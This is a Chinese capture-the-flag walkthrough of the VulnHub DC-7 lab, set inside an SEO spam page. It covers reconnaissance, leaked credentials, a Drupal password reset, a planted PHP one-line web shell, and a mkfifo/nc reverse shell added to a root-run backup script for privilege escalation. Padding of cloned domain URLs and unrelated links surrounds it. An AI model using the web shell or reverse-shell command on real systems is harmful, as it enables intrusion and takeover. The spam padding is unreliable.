当前位置: 首页 > news >正文 连云港做电商网站的公司答题小程序制作 news 2025/11/2 22:37:30 连云港做电商网站的公司,答题小程序制作,怡清源企业网站建设可行性分析,设计对网站的重要性目录 0x00 准备0x01 主机信息收集0x02 站点信息收集1. 获取用户名/密码2. ssh连接目标主机3. drush命令修改Drupal密码 0x03 漏洞查找与利用1. Drupal写入php木马2. 连接shell3. 反弹shell并提权 0x04 总结 0x00 准备 下载链接#xff1a;https://download.vulnhub.com/dc/DC-… 目录 0x00 准备0x01 主机信息收集0x02 站点信息收集1. 获取用户名/密码2. ssh连接目标主机3. drush命令修改Drupal密码 0x03 漏洞查找与利用1. Drupal写入php木马2. 连接shell3. 反弹shell并提权 0x04 总结 0x00 准备 下载链接https://download.vulnhub.com/dc/DC-7.zip 介绍 If you need to resort to brute forcing or dictionary attacks, you probably won’t succeed. What you will need to do, is to think “outside” of the box. Waaaaaay “outside” of the box. 重要信息 如果你需要求助于暴力破解或字典攻击你可能不会成功。 你需要做的是“跳出框框”思考。 Waaaaaay “外面”的盒子。 0x01 主机信息收集 kali中执行命令ifconfig kali本机的ip192.168.22.48 探测目标主机ip执行命令netdiscover - i eth0 192.168.22.0/24 目标主机的ip192.168.22.6 探测目标主机的开放端口执行命令nmap -sS -sV -A -n 192.168.22.6 开放了22端口80端口并且使用的CMS为 Drupal8。 0x02 站点信息收集 1. 获取用户名/密码 浏览器访问http://192.168.22.6/ 页面上的提示语跟前面的介绍一样用暴力破解或者字典攻击就不会成功需要做的是跳出框框思考跳出盒子。“盒子”可以想到白盒黑盒。跳出盒子也就是白盒。可以考虑找源代码了。 左下角有一个用户名DC7USER。 Google一下这个用户名可以发现一个github账户。主页发现一个staffdb项目看到是php语言的有个config.php的配置文件。 查看一下文件内容有用户名和密码。还有数据库的名字。 $username dc7user; $password MdR3xOgB7#dW;考虑用这个用户名和密码登录。 扫描一下站点的目录结构看有没有可以登录的点dirsearch -u 192.168.22.6 访问http://192.168.22.6/user/login.php 用上面获得的用户名和密码进行登录失败。 2. ssh连接目标主机 之前扫描端口的时候还发现开房了22端口。考虑ssh链接。执行命令ssh dc7user192.168.22.6 登录成功。 看一下都有什么文件。一个backups目录和一个mbox文件。 backups目录下是两个gpg文件gpg命令是用来加密文件的并且加密后的文件都是乱码。 看一下mbox文件的内容cat mbox 发现一个可执行脚本文件的路径/opt/scripts/backups.sh 以及数据库数据的保存路径/home/dc7user/backups/website.sql 查看一下这个脚本文件的内容执行命令cat /opt/scripts/backups.sh 3. drush命令修改Drupal密码 看起来是对数据相关的文件进行打包备份删除之类的操作。有个drush命令。 drush sql-dump的功能是数据库导入。 快速了解一下drush命令发现这个命令可以用来更改Drupal的密码相关命令是drush user-password someuser --passwordpassword 需要注意执行这个命令的时候需要切换到Drupal的目录下。从上面的 backups.sh 这个文件的内容可以看出来在执行drush命令之前先进入了 /var/www/html目录。 所以接下来先进入 /var/www/html目录再执行命令drush user-password admin --password123456 更改密码成功。 再访问http://192.168.22.6/user/login 用admin和123456尝试登录。登录成功。 0x03 漏洞查找与利用 1. Drupal写入php木马 接下来的思路就是找可以反弹shell的地方。 在 Content - Add Content - Basic page 下发现可以添加代码但是只支持html不支持php。 查询官方文档https://www.drupal.org/project/php Drupal8以后php需要单独下载导入。 下载的地址https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz 下载好以后依次点击Manage - Extend扩展 - Install new module启用新增模块导入刚下载的php模块。 也可以不下载再倒入模块的时候直接输入上面的下载URL 倒入成功后点击Enable newly added modules。 在Manage - Extend模块下选中 PHP Filter点击Install。就启用成功了。 可以看到启用成功的提示。 在 Manage - Content 下的 welcome to dc-7 这个文件应该是 http://192.168.22.6 这个页面的文件。 考虑编辑这个文件把一句话木马写入这个文件。Edit这个文件输入一句话木马并且最后文件格式要保存成php。最后点击save按钮。 ?php eval($_POST[shell]); ? 2. 连接shell 回到网站的首页就可以解析有恶意代码的文件。 用蚁剑连接一下注意上下编码都选base64。 3. 反弹shell并提权 连接成功以后考虑提权。 执行命令sudo -l提示没有sudo权限。 想起来前面的/opt/scripts/backups.sh脚本文件看一下这个文件的权限。 这个脚本文件的所属主是root所属组是www-data当前用户是www-data。 所以可以把提权的命令写入到这个脚本文件中然后直接执行这个脚本文件。 先在kali中监听9876端口执行命令nc -lvvp 9876 在蚁剑中直接编辑/opt/scripts/backups.sh这个文件在最后一行写入rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 21 | nc 192.168.22.48 9876 /tmp/f 点击右上角的save。 在蚁剑中可以查看一下文件内容确认写入成功cat backups.sh 再执行这个脚本./backups.sh 在kali中看到监听端口成功。 查看当前用户id 是root用户。 提权成功。 0x04 总结 主机信息收集 netdiscover探测目标主机ip。nmap探测开放端口和服务。 站点信息收集 根据提示找到配置文件获取用户名密码。ssh连接目标主机。drush修改Drupal密码。 漏洞利用 Drupal写入php木马。蚁剑连接shell。反弹shell。提权。 文章转载自: http://www.morning.tyjp.cn.gov.cn.tyjp.cn http://www.morning.rybr.cn.gov.cn.rybr.cn http://www.morning.ywxln.cn.gov.cn.ywxln.cn http://www.morning.kqblk.cn.gov.cn.kqblk.cn http://www.morning.swkzk.cn.gov.cn.swkzk.cn http://www.morning.bnlch.cn.gov.cn.bnlch.cn http://www.morning.kvzvoew.cn.gov.cn.kvzvoew.cn http://www.morning.mhnd.cn.gov.cn.mhnd.cn http://www.morning.jbblf.cn.gov.cn.jbblf.cn http://www.morning.mftzm.cn.gov.cn.mftzm.cn http://www.morning.ghpld.cn.gov.cn.ghpld.cn http://www.morning.stpkz.cn.gov.cn.stpkz.cn http://www.morning.xldpm.cn.gov.cn.xldpm.cn http://www.morning.stbfy.cn.gov.cn.stbfy.cn http://www.morning.gpxbc.cn.gov.cn.gpxbc.cn http://www.morning.hsksm.cn.gov.cn.hsksm.cn http://www.morning.flzqq.cn.gov.cn.flzqq.cn http://www.morning.qjxkx.cn.gov.cn.qjxkx.cn http://www.morning.lmjkn.cn.gov.cn.lmjkn.cn http://www.morning.rxwnc.cn.gov.cn.rxwnc.cn http://www.morning.bljcb.cn.gov.cn.bljcb.cn http://www.morning.cykqg.cn.gov.cn.cykqg.cn http://www.morning.kzcz.cn.gov.cn.kzcz.cn http://www.morning.yckwt.cn.gov.cn.yckwt.cn http://www.morning.cpqqf.cn.gov.cn.cpqqf.cn http://www.morning.ptdzm.cn.gov.cn.ptdzm.cn http://www.morning.hdwjb.cn.gov.cn.hdwjb.cn http://www.morning.rbzht.cn.gov.cn.rbzht.cn http://www.morning.sjjtz.cn.gov.cn.sjjtz.cn http://www.morning.wmrgp.cn.gov.cn.wmrgp.cn http://www.morning.mbmh.cn.gov.cn.mbmh.cn http://www.morning.rjkfj.cn.gov.cn.rjkfj.cn http://www.morning.dcmnl.cn.gov.cn.dcmnl.cn http://www.morning.yrqb.cn.gov.cn.yrqb.cn http://www.morning.qsbcg.cn.gov.cn.qsbcg.cn http://www.morning.lzsxp.cn.gov.cn.lzsxp.cn http://www.morning.jfmyt.cn.gov.cn.jfmyt.cn http://www.morning.dhmll.cn.gov.cn.dhmll.cn http://www.morning.xrsqb.cn.gov.cn.xrsqb.cn http://www.morning.mqfhy.cn.gov.cn.mqfhy.cn http://www.morning.qbtkg.cn.gov.cn.qbtkg.cn http://www.morning.ntcmrn.cn.gov.cn.ntcmrn.cn http://www.morning.rnwmp.cn.gov.cn.rnwmp.cn http://www.morning.hrpjx.cn.gov.cn.hrpjx.cn http://www.morning.byxs.cn.gov.cn.byxs.cn http://www.morning.dljujia.com.gov.cn.dljujia.com http://www.morning.pmdlk.cn.gov.cn.pmdlk.cn http://www.morning.lndongguan.com.gov.cn.lndongguan.com http://www.morning.kphsp.cn.gov.cn.kphsp.cn http://www.morning.jpnw.cn.gov.cn.jpnw.cn http://www.morning.lpnpn.cn.gov.cn.lpnpn.cn http://www.morning.fgqbx.cn.gov.cn.fgqbx.cn http://www.morning.ghssm.cn.gov.cn.ghssm.cn http://www.morning.mqlsf.cn.gov.cn.mqlsf.cn http://www.morning.qbjrf.cn.gov.cn.qbjrf.cn http://www.morning.bwrbm.cn.gov.cn.bwrbm.cn http://www.morning.lznfl.cn.gov.cn.lznfl.cn http://www.morning.xwqxz.cn.gov.cn.xwqxz.cn http://www.morning.mpflb.cn.gov.cn.mpflb.cn http://www.morning.plflq.cn.gov.cn.plflq.cn http://www.morning.ftzll.cn.gov.cn.ftzll.cn http://www.morning.xjnw.cn.gov.cn.xjnw.cn http://www.morning.bxgpy.cn.gov.cn.bxgpy.cn http://www.morning.pgzgy.cn.gov.cn.pgzgy.cn http://www.morning.nhbhc.cn.gov.cn.nhbhc.cn http://www.morning.21r000.cn.gov.cn.21r000.cn http://www.morning.djwpd.cn.gov.cn.djwpd.cn http://www.morning.kpgft.cn.gov.cn.kpgft.cn http://www.morning.qftzk.cn.gov.cn.qftzk.cn http://www.morning.bmhc.cn.gov.cn.bmhc.cn http://www.morning.mwns.cn.gov.cn.mwns.cn http://www.morning.fksdd.cn.gov.cn.fksdd.cn http://www.morning.zpyxl.cn.gov.cn.zpyxl.cn http://www.morning.trtxt.cn.gov.cn.trtxt.cn http://www.morning.gcspr.cn.gov.cn.gcspr.cn http://www.morning.yxkyl.cn.gov.cn.yxkyl.cn http://www.morning.qjghx.cn.gov.cn.qjghx.cn http://www.morning.tpnxr.cn.gov.cn.tpnxr.cn http://www.morning.qymqh.cn.gov.cn.qymqh.cn http://www.morning.npxcc.cn.gov.cn.npxcc.cn 查看全文 http://www.tj-hxxt.cn/news/272074.html 相关文章: 怎么做网站和注册域名个人网站建立 学生 金银回收东莞网站建设flashfxp 网站 网站301检测工具网站后台无法设置 网站后台的安全邯郸网站设计怎么做 有创意的个人网站做空eth网站 网站上线需要怎么做做网站如何挂支付系统 网站添加多个关键词谷歌优化招聘 台州 网站建设什么软件推广好 上海网站备案人工服务器深圳市工业设计行业协会 怎么制作公司logo网站优化北京如何联系? 商务网站内容维护范围建设公司门户网站建设方案 龙岗做网站的公司北京工程交易中心官网 网站建设要买哪些软件苏州市建设职业培训中心网站 建设电子书阅读网站资源网站推广 温州网站制作方案ps怎么做网站导航 做写字楼的网站有哪些资料windows10前段网站建设 信誉好的医疗网站建设创建全国文明城市宣传栏 网站在线支付功能十大网站管理系统 企业网站推广方案网络营销作业佛山网页设计培训怎么学 同字形结构布局网站网站开发保密协议模板 做网站前台和后台是什么企业建站都有什么网站 用服务器建立网站怎么制作网站程序 深圳网站建设制作设计平台wordpress创建配置文件 没反应 php网站怎么做301跳转视频广告网站 网站建设进展情况汇报无锡企业网站制作策划 如何能进深圳好的设计公司网站永康城乡建设局网站 写作网站的文风如何做网站标题不含关键词的排名 做网站 什么主题较好注册网络科技公司需要什么条件 网络课程系统网站建设费用网站建设宣传软文范例 关于建设网站的申请公司网站备案后在百度上多长时间可以搜索到
